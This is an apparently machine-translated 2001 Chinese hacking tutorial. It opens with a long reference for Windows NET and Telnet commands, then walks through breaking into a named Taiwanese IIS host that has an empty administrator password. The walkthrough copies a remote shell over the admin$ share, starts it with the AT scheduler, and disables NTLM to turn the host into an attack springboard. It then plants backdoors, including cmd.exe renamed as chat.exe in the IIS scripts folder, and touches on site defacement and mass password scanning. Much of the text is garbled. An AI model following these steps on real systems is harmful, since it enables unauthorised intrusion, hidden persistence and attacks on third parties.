NT simple invasion tutorial
2001-04-18.21: 49: 03
"China Hunting Network Security Technology Alliance" http://www.cnhonker.com Honker Union of China "NT Simple Invasion" ------------------ Today we come to see Look at the intrusion process of the Taiwan NT host. Tools: Download Address: Xiaoxi Site: http://www.netxeyes.com It is recommended that you have a NT4.0 / Win2000 to better play the functionality of software and commands. Little Drain 2000 installation of IPChowTo under the directory. Tools These two directory have tutorials and tools. You can also look at his tutorial. But I found that there is a solution in it is not the best, here, let me talk about my intrusion step. :) Everyone may not know what IPC connection is. Let's take a look at the IPC it is the meaning of communication between UNIX. Here we are talking about IPC under Windows, which is mainly the resource of the named pipe, which is important for the program. Use when you remotely manage your computer and view your computer's shared resource. Under Windows, it is implemented with a NET command. In the test report, we can often see the words of the empty connection. Many people don't know what is empty, he is actually an IPC connection that does not have a password and user name. Specific NET USE // IP "/ user:" Below is the basic usage of the NET command integrates Windows 98, Windows Workstation, and Windows Server three operating systems about the interpretation of the NET command, I hope to be comprehensive. Let some say some: (1) The NET command is a command line command. (2) Manage network environments, services, users, and login. . . . Whenever local information (3) WIN 98, WIN WORKSTATION and WIN NT have a NET command. (4) However, the net command of Win 98 is different from the net command of WorkStation, NT. (5) The net command in WorkStation and Server is basically the same. (6) Get HELP (1) can be graphically using the way in NT - "Help -" Index - "Enter NET (2) Under Command, NET /? Or NET or NET HELP get some method Help NETCOMMAND / HELP or NET HELP COMMAND or NET COMMAND /? Other NET HELPMSG Message # is 4-digit (7) Forced Parameters All NET Command Accept / Yes and / NO (Acbever Y / Y) / N). [Simple saying is to ask questions to the system in advance] (8) There are some commands to generate and permanently saved. When using it, it is necessary to use the function of the NET command to find the corresponding graphics tool. The composition of the program (10) Command Command Parameter Option Parameter Option Parameter Options. . . . . .瘰疬 罗 瘰疬 说 堆 堆 是 是 是 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事 事Some parameters in the NET command cannot be used in the DOS-WIN. You can only use the basic usage of the different parameters of the NET command in the DOS environment: (1) NET View: Display domain list, A list of shared resources for a computer list or a specified computer.
Command Format: Net View [/ / computername / domain [: domainname]] Parameter introduction: (1) Type NET View to display the current domain's computer list. (2) // computername Specifies the computer to view its shared resource. (3) / domain [: domainname] Specifies to view the domain of its available computer. Simple case: (1) Net View // Yfang View Yfang shared resource list. (2) NET View / Domain: Love View the list of machines in the LOVE domain. (2) NET User work: Add or change user accounts or display user account information. This command can also be written as NET Users. Command format: Net user [username [password *] [options]] [/ domain] parameter introduction: (1) Type NET User without parameters to view a list of user accounts on your computer. (2) UserName Add, delete, change, or view the user account name. (3) Password assigns or change the password for the user account. (4) * Tip Enter the password. (5) / Domain executes the operation in the main domain controller of the computer main domain. Simple case: (1) NET user yfang View User Yfang Information (3) NET USE: Connect your computer or disconnect the computer and shared resources, or display your computer's connection information. Command format: NET Use [DeviceName *] [// computername / sharename [/ volume]] [Password *]] [/ user: [domainname /] username] [[/ delete] [/ persistent: {yes no}]] Parameter introduction: Type NET Use of NET Use without parameters to list network connections. DeviceName Specifies the name of the resource to be connected or the device name to be disconnected. // Computername / ShareName server and shared resources name. Password Access the password for shared resources. * Tip Type password. / User specifies another user that is connected. DomainName Specifies another domain. UserName Specifies the username of the login. / HOME connects the user to its host directory. / DELETE Cancels the specified network connection. / Persistent controls the use of permanent network connection. Simple case: (1) NET USE E: // Yfang / TEMP Set the // yfang / temp directory to E disk (2) NET USE E: // Yfang / Temp / Delete Disconnect (4) NET TIME Role: Make the computer's clock synchronization with another computer or domain. Command Format: Net Time [// computername / domain [: name]] [/ set] parameter introduction: (1) // ComputerName To check or synchronize server names. (2) / domain [: name] Specifies the domain to synchronize with its time. (3) / SET Synchronize the computer clock with the clock specified by the specified computer or domain. The following four parameters are related, so introduce (5) NET START: Start service, or display the list of start-up services. Command format: Net Start Service (6) NET PAUSE: Pause the running service. Command format: NET PAUSE Service (7) Net Continue Schedule: Reactivate the hang service. Command Format: Net Continue Service (8) NET STOP: Stop Windows NT Network Services.
Command format: Net Stop Service parameter introduction: Let's take a look at what these services are (1) ALERTER (2) Client Service For NetWare (3) Clipbook Server (4) (4) (4) (4) (4) CLIPBOOK Server (4) Clipbook Server (4) Computer Browser (5) Directory Replicator (Directory Replicator) (6) FTP Publishing Service (FTP) (FTP Release Services) (7) LPDSVC (8) NET LOGON (Network Login) (9) Network DDE (Network DDE) (10) Network DDE DSDM (11) Network Monitor Agent (12) NT LM Security Support Provider (NT LM Security Support) (13) OLE (Object Link Embedded) (14) Remote Access Connection Manager (Remote Access Connection Manager) (15) Remote Access Isnsap Service (Remote Access ISNSAP Service) (16) Remote Access Server (17) Remote Procedure Call (RPC) Locator (Remote Process Call Locator) (18) Remote Procedure Call (RPC) Service (Remote Process Call Service) (19) Schedule (Sand) (20) Server (Server) (21) SIMPLE TCP / IP SERVICES (Simple TCP / IP Service) (22) SNMP (23) Spooler (24) TCP / IP NetBIOS Helper (TCP / IP NetBIOS Aid) (25) UPS (26) Workstation (Workstation) (27) Messenger (letter) 28) DHCP Client (29) EventLog The following services can only be used on NT Server (1) File Server for Macintosh (2 Gateway Service For NetWare (3) Microsoft DHCP Server (4) Print Server for Macintosh (5) RemoteBoot (6) Windows Internet Name Service (9) Net Statistics Run: Displays statistical records for local workstations or server services. Command format: Net statistics [Workstation Server] Parameter Description: (1) Type Net Statistics that does not have parameters lists the running services available to their statistics. (2) WorkStation Displays statistics for local workstation services. (3) Server displays statistics for local server services. Simple case: (1) NET STATISTICS Server More Display server service statistics (10) NET Share work: Create, delete, or display shared resources. Command format: NET Share ShareName = Drive: path [/ users: Number / undiMITED] [/ Remark: "text"] parameter introduction: (1) Type NET Share with non-parameters Displays information on all shared resources on the local computer. (2) ShareName is the network name of shared resources. (3) DRIVE: PATH Specifies the absolute path to the shared directory. (4) / Users: Number settings can access the maximum number of users for shared resources at the same time. (5) / unlimited does not limit the number of users who simultaneously access the shared resource.
(6) / Remark: "text" Add a comment on the resource, and the text is taken by quotation marks. Simple case: (1) NET Share myLove = C: / Temp / Remark: "My First Share" Share C: / Temp (2) Net Share MYLOVE / DELETE Stop Sharing MYLOVE Directory (11) NET Session : List or disconnect the local computer and the session of the client connected to it, or Write as NET sessions or net sess. Command Format: Net Session [// computername] [/ delete] Parameter Description: (1) Type NET session without parameters Show all sessions of the local computer. (2) // COMPUTERNAME identifies the computer to list or discontinue the session. (3) / delete ends with // computername computing opportunities and closes all the computers during this session? 蚩? . (12) NET SEND: Send a message to other users of the network, computer, or communication name. Command format: Net send {name * / domain [: name] / users} Message parameter introduction: (1) Name To receive username, computer name, or communication name of sending messages. (2) * Send messages to all names in the group. (3) / Domain [: Name] sends the message to all the names in the computer domain. (4) / Users sends the message to all users connected to the server. (5) Message is sent as a message. Simple case: (1) NET send / users Server Will Shutdown in 5 minutes. Send messages to users (13) Net Print: Display or control print jobs and print queues. Command format: Net print [// computername] Job # [/ hold / release / delete] Parameter introduction: (1) ComputerName Sharing the computer name of the printer queue. (2) ShareName print queue name. (3) JOB # Assign the identification number of the print job in the printer queue. (4) / Hold Use Job #, wait in the printer queue to wait. (5) / Release releases the reserved print job. (6) / Delete removes the print job from the printer queue. Simple case: (1) Net print // Yfang / SeeMe lists the directory of the SEEME printer queue on the // yfang machine: Add or delete the message name (sometimes called alias), or display the computer receive message Name list. Command format: Net name [name [/ add / delete] parameter introduction: (1) Type Net Name without parameters lists the names currently used. (2) Name Specifies the name of the received message. (3) / add Add the name to your computer. (4) / Delete removes the name from the computer. (15) NET localgroup: Add, display, or change the local group. Command format: Net localgroup groupname {/ add [/ comment: "text"] / delete} [/ domain] parameter introduction: (1) Type NET localgroup display server name and computer's local group name. (2) Groupname To add, expand or delete local group names.
(3) / Comment: "text" Add a comment for the new or existing group. (4) / Domain executes the operation in the current domain's primary domain controller, otherwise only on the local computer? (5) Name [...] lists one to be added to a local group or from a local group Or multiple usernames or group names. (6) / add Add the global group name or username to the local group. (7) / Delete removes a group name or username from the local group. Simple case: (1) Net localgroup love / add Add a local group named LOVE to a local user account database (2) NET localgroup love Displays users in the local group (16) NET GROUP: in the Windows NT Server domain Add, display, or change global groups. Command Format: Net Group GroupName {/ add [/ comment: "Text"] / delete} [/ domain] parameter introduction: (1) Type NET Group display server name and server group name without parameters. (2) Groupname To add, extend, or delete groups. (3) / Comment: "text" Adds a comment for the new group or existing group. (4) / Domain executes this operation in the current domain's primary domain controller, otherwise perform actions on the local computer?? (5) UserName [...] list Show to add one or from the group or from the group or Multiple users. (6) / add group or add the username in the group. (7) / delete delete group or deletes the username from the group. Simple case: (1) Net group love yfang1 yfang2 / add Adds existing user accounts YFANG1 and YFANG2 to local Computers LOVE group (17) NET File Scheme: Displays all open shared file names and lock files on a server. Command format: Net file [id [/ close]] Parameter introduction: (1) Type NET File without parameters to open a list of files on the server. (2) ID file identification number. (3) / Close Close the open file and release the lock record. (18) NET Config: Displays the currently running configurable service, or displays and changes the settings of a service. Command Format: Net config [service [option] Parameter introduction: (1) Type NET Config display a list of configurable services. (2) The service is configured by the NET config command (Server or Workstation) (3) Options service for specific options. (19) NET Computer work: Add or delete a computer from the domain database. Command format: Net computer // computername {/ add / del} parameter introduction: (1) // computername Specifies the computer to be added to the domain or from the domain. (2) / add Tim the specified computer to the domain. (3) / DEL will delete the specified computer from the domain. Simple case: (1) Net computer // CC / Add Add computer CC to the login domain (20) NET Accounts action: Update the user account database, change the login requirements for all accounts, and all accounts. Command format: Net Accounts [/ forcelogf: {minutes no}] [/ minpwlen: length] [/ maxpwage: {days unlimited}] [/ minpwage: days] [/ uniquepw: Number] [/ domain] parameter introduction: (1 Net Accounts that uses without parameters display the current password setting, login time limit, and domain information.
(2) / forcelogoff: {minutes no} Set the number of user account passwords when the user account or the valid login time expires (3) / MINPWLEN: Length Set the maximum number of characters. (4) / maxpwage: {days unlimited} Set the maximum number of days that is valid for the user account password. (5) / MINPWAGE: DAYS Setting the user must keep the minimum number of days. (6) / UniquePW: Number requires a user to change the password, the same password must be reused after Number. (7) / Domain executes this operation on the main domain controller of the current domain. (8) / SYNC When used for the primary domain controller, this command synchronizes all backup domain controllers in the domain: (1) NET Accounts / MINPWLEN: 7 Sets the minimum number of characters of the user account password to 7 - -------------------- The above introduction is the basic usage of net commands under WinNT ------------------------------------------------------------------------------------------------ ---- Let's take a look at the NET command under Win98's basic usage in Win98. There is also some parameters of the name and function and simple usage method and the usage of the corresponding parameters under WinNT. Some of them (1) NET TIME Command (2) Net Print Command (3) NET Use Command (4) NET View Command In Win98 NET Command Some Parameters The name of the parameters is the same, but the usage of the corresponding parameters, but it is a bit different from it (1 NET START effect: Start the corresponding service. (Cannot use in DOS-WIN) Command Format: Net Start [Basic Nwlink] [/ List] [/ YES] [/ Verbose] (2) NET STOP RET: Stop the corresponding service. (Can't be in DOS) -Win) Command format: Net Stop [Basic Nwredir Workstation NetBeui NWLINK] [/ yes] There are also some parameters in the net command in Win98. There are (1) NET DIAG roles: Diagnostics running MS Program Display Network Diagnostic Information Command Format: Net Diagnostics [/ Names / Status] (2) NET INIT effect: Do not load protocol or network card driver (not in DOS-WIN) command format: Net Initialize [/ Dynamic] (3) NET logoff: Disconnect shared resources (cannot be used in DOS-WIN) ((4) NET LOGON effect: Log in in Workgroup (can not be used in DOS-WIN) command format: net logon [user [password?]] [/ domain: name] [/ yes] [/ savepw: no] (5) NET Password effect: Change your network login password (can not be used in DOS-WIN) Command format: Net Password // computer / domain: Name [user [oldpassword [newpassword]] At the same time, we also know some Telnet's knowledge. Remote lines (Telnet) 1. About remote networking remote lines are an incredible tool, it makes it You exceed the use of the remote computer system in general time and space. It has a remote connection, the sharing of computer soft hardware resources has become very efficient. For a metaphor, you can connect to the super computer located in somewhere ( Suppose you have access to access), do the heavenly simulation operation, when the results are rapidly generated, you can transfer the data to another graphical simulation workstation, which produces an entity analog map.
In this example, you have used a super computer and a graphic processing workstation, and your hands are really touched, it is likely to be a personal computer (PC) in the laboratory, but the other two computers may I don't know where it is! Yes, you don't need to know, through the Internet's remote connection tool, you only need to know where you want the CPU time, and the application software. The remote network can be applied to the environment across the time and space, of course, also applies to the office area network, and a computer simulates a terminal for another computer and connects to the other party. What is TELNET? Perhaps the readers have heard that Telnet is one of the communication agreements. For this, you can neglect it. Readers may wish to simply think that Telnet is a practical tool that has just been a specific feasible, that is, we are just one of the tools that take the Telnet for one of the tools that perform remote links, let a computer connection Enter another computer. The author remembers that many times have been mentioned many times, and most of the applications on the network use Client / Server mode. In Chinese, it is necessary to have one end is the request side, the request is executed, the Telnet request program. At the end of the host, the device has a servo program to accept the connection request, but in most cases, the host terminals CLIENT and Server have. The remote network is not very different from you to load a host locally through telephone line or any other way. You must have a private usage account in the other party, and your password, like this You have a way to connect to the host system. Please refer to the following description on the details. In addition, on the Internet, there are quite a variety of service systems to provide services in this way, where most of them are free services, like hytelnet, bbs, gopher and archie, etc., this type of system is usually Open a public account and do not need to use a password. Telnet features a terminal that simulates a remote computer system that loads the computer system over the network connection. If you have a personal computer that runs DOS in your laboratory, the computer has also been connected to the campus network. You can ask people to help you install a set of NCSA Telnet software, you can then do these incredible things described above ( The author has never blown :-)). NCSA Telnet is a request program specially designed for DOS. It is not necessary to worry on the UNIX machine. At the same time.
II. Example: Remote network distal end of a host system ??????????????????????????????????????? ?????? ┐ │ $ telnet jet.ncic1.ac.cn ← Connection │ │ Trying 159.226.43.26 ... │ │ Connected to 159.226.43.26 │ ^] '. │ │ │ │ Sunos UNIX (SPARC4) │ │ │ │ Login: Feng ← Enter the account password: ****** ← Enter the password │ │ Last login: Thu Dec 30 11:37:17 from 159.226.43.45 │ │ Sunos Release 4.1.1 (SPARC15) # 1: Tue Nov 12 05:15:31 CST 1996 │ │ │ └ ????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????. The above operation is a typical remote network application. A certain public service system provided by a host system remotely, as for many commercial service systems, can also be used in this way. In the Internet, we can find a lot of interesting service systems, say, if you like to play chess, you also find some Go service system, using this system you can play with another person (note is the opponent is "people", And you may not know the opponent's corner, wonderful!), Other like a online game system (thanks MUD) you have time to try. Other service systems are like BBS, IRC and Gopher, etc. can also be served through Telnet. III. Telnet, TN3270 When you are remotely connected, you only need to know how many Telnet instructions, bigger, how to perform your local instructions (your own host), how to end the connection and don't Used interrupt connection, etc. The use of Telnet does not have a lot of unique operational instructions like FTP. Whether in the DOS or UNIX environment, Telnet is a very easy instruction, you have hardly need any learning, you should know more than the start of the connection action, and finally to exit the operational procedure when the other system is required, the following author only Introduction Two instructions: The Telnet under UNIX is almost the same, the different people, only because the connected to the other system is not the same, so the operation procedure is slightly different, so you have to pay attention to it. " "The requirements for the other party system to interrupt the connection. For example, when you use the TN3270 connection IBM VM VM VM VM system, "logoff" (case is not anrth) is the instruction of the connection, unless you have to have, do not end the connection with the UNIX "Kill" instruction. Under UNIX, you can press Ctrl-] (CTRL key and] button at the same time, sometimes press twice) Temporary return to the Telnet / TN3270 environment, then you can perform Telnet / TN3270 itself instruction There will be a picture below.
┌ ??????????????????????????????????? ┐│ telnet>? ←? symbols help │ │ Commands may be abbreviated Commands are:. │ │ │ │ close close current connection │ │ display display operating parameters │ │ mode try to enter line-by-line or character-at-a-time mode │ │ open connect to a site │ │ quit exit telnet │ │ send transmit special characters ( 'send?' for more) │ │ set set operating parameters ( 'set?' for more) │ │ status print status information │ │ toggle toggle operating parameters ( ' TOGGLE? 'for more │ │ z suspend telnet │ │? Print Help Information │ │ Telnet> │ │ │ │ TOGGLE? 'For more │ │? Z suspend telnet │ │? Print Help Information │ │ Telnet> Status ← View Current Connection Location │ │ No Connection. │ │ Escape Character is' ^]' │ │ Telnet> Z ← Temporarily return to the local shell, put the connection work on the background │ │ │ [1]
Stopped Telnet │ │ │ │ ^】 Kill. │ │ ^ /] Quit. │ │ ^]] │ │ │ │ $ fg ← Care back to the front desk (return Telnet │ │ │ │ │ Telnet> q ← Interrupt connection (not encouraged) │ │ $ │ └ ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ??????????????????? ┘ In addition, from the Telnet back to the connection, you only need to press the button under the Telnet> prompt symbol. The above description is also applied to TN3270, where the author does not explain. Finally, the author can only tell you, Telnet itself is very easy to operate and understand, why not give a lot of examples this section. The system that telnet can connect is what you have to know. Telnet can be said to be just a bridge. When you walk the bridge, you don't know if the bridge is those craftsmen or use those materials.
Ok, let's transfer to the topic. :) Let's scan a foreign website NT machine, and then use the simple detection of the streamer IPC to easily find the stupid network administrator, like I scanned the five-hour Taiwan network to find 1822 passwords. . If you don't use streamer, please see the help files in the IPChowTo directory of the stream 2000. I will not say more here. You can also use the NT password published twice. There will be a lot of no change. This is also the Taiwan NT found there. :) Now suppose we successfully detect the password of the super administrator Administrator of the NT host 211.21.193.202 in Taiwan. There will be similar information on the probe report of the flow of light. Server: 211.21.193.202 UserName: Administrator (admin) Password: [empty] fatal vulnerability http server type: Microsoft-IIS / 5.0 start page title: ?? From HTTP Server Type: Microsoft-IIS / 5.0 we can Seeing him should be a Win2000 and installing a web service. If it is Microsoft-IIS / 4.0 or lower version, it is the machine below NT 4.0. (It is recommended that everyone will find Win2000 experiments because Win2000 comes with Telnet daemon, and NT must be installed separately. We can easily change Telnet to the springboard we need, which can be used to attack other network hosts. To hide your true IP address, use NT's springboard with a benefit of using UNIX springboards, UNIX's springboard is difficult than NT, so we use this handless Win2000 to do things for us. Huh :) Below is the steps of remote login when we are empty at 211.21.193.202's hyper administrator Administrator. Note that the password to be super administrator can have better execution permissions. NT remote login command line syntax: NET USE // IP Address / IPC $ ["Password"] / user: "username" exits the syntax of the login: NET USE // IP Address / IPC $ / Delete Net Use ///211.21. 193.202 / IPC $ "" / user: "administrator" If the command successfully completed the remote login of our via IPC. After the successful landing, copy a Telnet program (Srv.exe in the Tools directory in the small flow), this program is opened on the NT, and the port is 99.
Copy e: /hker/srv.exe //211.21.193.202/admin $ is a default hidden share of NT, and he corresponds to the System32 directory in the NT installation directory. Usually in C: / Winnt / System32, you can also use C $, D $ them represents the drive letter C disk, D disk. They are all default sharing of the system. Usually we copy the program to Admin $, because the file here is more, it is not easy to be discovered. There is no need to specify the specific directory when starting. :) Host display: E: /hker/srv.exe has copied 1 file. Our copies are successful. (If you just want to black him, then: Copy E: /hker/index.htm // ip / c $ / inetpub / wwwroot is ok. But the real path and start files of the specific homepage of the host, You can use http://ip/i.ida to see the physical path. The default use of the above commands can be used. We don't want to be black here, we just use it to do things for us :) Step how to start this program problem. There is a Schedule service on the NT, we use it to launch this program. First look at the time at this time in order to determine when started. Net Time //211.21.193.202 Display: //211.21.193.202 The current time is 2000/12/24 08:55 command successfully completed. We can see the host's time is 2000/12/24 08:55 (there is a problem here, if the two machines are in different time zones, the above display has a line, it is used to represent the current time of the target host, we When taken, it is subject to this current time. At the same time, we have to replace the displayed time to 24 hours. For example, the above "08:55" time corresponds to 24 hours, it is 20:55 points, we want this time . :) AT command format is the AT // IP target host to start using time Timer Service This is here. We are at //211.21.193.202 21:00 Srv.exe Show: Added a job, Its homework ID = 0 Our service has been successfully added. (If the "Service is still not started", the other party is not launching the Schedule service. Since we are already Administrator, you can use Microsoft's NT RTK (can download) Netsvc in its site to remotely start Schedule. service.
NetSVC under the Tools directory under the installation directory of Small Fluorescent 2000. Remote startup method is: Netsvc //211.21.193.202 Schedule / Start Specific everyone can see the tutorial in the stream. Then we use the AT command to launch it. We can also like this: Copy E: /honker/srv.exe //211.21.193.202/d (inetpub/scripts) Copy srv.exe to C: / INETPUB / Scripts, which is the Scripts directory of IIS. Then we start it with your browser: http://ip/scripts/srv.exe is OK. But this start-up srv.exe permissions are not enough, so we still use the AT command to start better. :) Wait a few minutes, we can telnet. Telnet 211.21.193.202 99 (Srv.exe open port is 99. Here we don't have to enter the password and no log records, but every time you use it, you want to restart next time. It can only be used again.) Here: Microsoft Windows 2000 [? セ 5.00.2195] (c) Copyright 1985-1999 Microsoft Corp. C: / WinNT / System32> We successfully landed. At this time, we have to make him a springboard, but we have a file without upload. Why do you have to do this, you can do a good job in NT, and have a very detailed introduction in the help of light. We will not say it. We can do it with you :) First open a DOS window in this manner, then COPY E: /Honnker/ntlm.exe //211.21.193.202/admin $ Copy the file, return to the Telnet window, come to run our just Uploaded procedures: Here we are knocked into NTLM. C: / Winnt / System32> NTLM Display: Windows 2000 Telnet Dump, By Assassin, All Rights Reserved. Done! C: / Winnt / System32> C: / Winnt / System32> Description We have succeeded. :) Then we use the net command to stop Telnet and restart this service, net stop telnet stop Telnet service C: / winnt / system32> net start telnet? ゼ ゼ Telnet? 灿戈 叫? Net helpMSG 3521? Here is the traditional Win2000 so we can't see the specific content, but he reports the error, :) Because the target host does not start the Telnet service. If the target bokeh does not open a Telnet service, the step of stopping the Telnet service can be omitted. You can start the TLENET service directly. :) Start the Telnet service method: NET Start Telnet C: / Winnt / System32> Net Start Telnet Telnet? タ タ? 笆. Telnet? Bill θ? This is a traditional Win2000 so we can't see specific Content, but the command is successful, the service is successful. OK,
A springboard is successful, we can Telnet 211.21.193.202 to connect to the target host, and we can now use him to come to Telnet without the output react. :) you can try telnet 211.21.193.202 NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00. 99201.1 Login: Login: DMINISTRATOR ===> (We are knocking into the user account to log in, here is Administrator, then carriage return) Password: ===> (We knocked into the password of the login account, here the administrator's password is empty, We can use it to enter!) Show: * ====================================== ========================= ?? ㄏノ microsoft telnet server? * ================= ======================================================== C: / > Oh, we have successful. :) The springboard is truly successful and used. (The tutorial inside Xiaoyu is not very good about there is a place in the springboard! It is he uses the netsvc command to stop and start the Telnet. Too much trouble. You can look at the original text in Xiaoyan artist: "In order to make the modification take effect, we need to restart the Telnet Server on the opponent's host.
"The command on his top graph is:" Netsvc //203.183.8.99 telnet / stop "Stop Telnet service with" Netsvc //203.183.8.99 telnet / start "to start Telnet service, just Telnet 211.21.193.202 99 When NTLM is executed directly, then the NET STOP Telnet Net Start Tlenet is then executed. This is why I have NT invading tutorials. H. huh, you use me. What should I use Xiao Yan? Do you choose that? Hehe :) At this time, we have to leave a back door, such as putting srv.exe in c: / inetpub / scripts so that the administrator has changed the password, next time Once again, you can access this machine through the browser. Although the permissions started more than teaching, we can still do a lot of things. Note that you can only change to * .exe files Oh, here we do: C: /> Copy C: / Winnt/System32/srv.exe c: / inetpub / scripts? Part 102/cmd.exe can also be copied to C: / INTPUB / scripts and change to another name. For example, chat.exe :) is also a good way to access the re-access. Specifically, you can see which executable directory uses some, hidden some of the files you want. After the name is hidden there, so as not to be deleted after the administrator discovers. Oh, pay only if it can only be changed to * .exe file. Here we perform C: /> Copy C: /Winnt/System32/cmd.exe C: /inetpub/scripts/chat.exe ?? 1? Lang? Copy success. You can copy to other executable directory to increase hiddenness.: Of course we activate the Guest account of the target machine and add it to The administrators group is the best. Below we continue to leave a guest user behind you.